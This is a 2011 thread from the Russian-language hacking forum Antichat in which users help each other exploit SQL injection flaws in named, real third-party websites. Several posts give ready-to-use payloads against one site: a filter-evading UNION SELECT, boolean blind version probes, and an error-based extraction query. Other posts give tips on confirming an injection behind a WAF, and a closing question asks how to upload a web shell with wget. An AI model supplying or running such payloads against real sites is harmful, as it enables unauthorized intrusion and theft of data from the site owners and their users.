ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.03.2011, 20:36
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
Провел на форуме:
37183
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Для начала нужно определить каким-либо образом действительно ли в скрипте идет перевод спецсимволов в сущности(аналог htmlspecialchars() в php)...
как это можно сделать ?
|
|
|
02.03.2011, 22:20
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Нашел какую то нестандартную скулю, ну или или ее подобие на нужном мне сайте.
http://www.bading.com/index.php?option=com_fireboard&Itemid=33&func=view &catid=2&id=667
После того как подставляю ' к func=view, сообщения ниже пропадают. Но если уберу &catid=2&id=667 сообщений и так не будет.
Подскажите пожалуйста, как с ней работать и скуля ли это вообще?
Добавлено через время
И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.
http://www.boatquotes.com/marine-surveys.php?catid=5
|
|
|
|
02.03.2011, 23:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Fooog
Fooog said:
И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов.
http://www.boatquotes.com/marine-surveys.php?catid=5
Думаю, что раскрутить её не получится.
|
|
|
|
02.03.2011, 23:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от FlaktW
FlaktW said:
Думаю, что раскрутить её не получится.
http://www.boatquotes.com/marine-surveys.php?catid=5/**/uNiOn/**/SeLeCt/**/1--+
Не могу понять логики запроса... Может кто сможет далее раскрутить.
Ну или можно крутить, как блайнд:
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=5--+ (true)
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=4--+ (false)
Попробуй сделать вывод в ошибку.
|
|
|
|
02.03.2011, 23:30
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
|
|
|
|
03.03.2011, 00:02
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Konqi
Konqi said:
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.
|
|
|
|
03.03.2011, 00:10
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от FlaktW
FlaktW said:
Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.
а вообще вот
|
|
|
|
03.03.2011, 01:29
|
|
Новичок
Регистрация: 02.07.2009
Сообщений: 1
Провел на форуме:
4390
Репутация:
0
|
|
Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку
/mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID% %5D'&url=980852'
кто реально может помочь пишите в личку дам полный линк
а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди
|
|
|
|
03.03.2011, 03:36
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от fin13
fin13 said:
Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку
/mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID% %5D'&url=980852'
кто реально может помочь пишите в личку дам полный линк
а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди
А в чем проблема, что 404 или выкидывает?
1) Может быть WAF.
2) Если идет инклюд или открытие файла, а ты вставляешь кавычку или из-за кавычки SQL-запрос становиться неверным, то перекидывать на главную страницу.
Там может быть и нету иньекции, с чего ты взял что она есть? о_0
Ну или попробуй вместо кавычки подставить верный SQL-запрос (and 1=1), и неверный (and 1=2) если при первом не перекинуло на главную, а на 2ом перекинуло, то SQL-inject есть.
Удачи.
|
|
|
|
03.03.2011, 15:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
какие еще команды есть напободие wget?
можно ли этой командой залить полноценный шелл? можно примерчик?
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
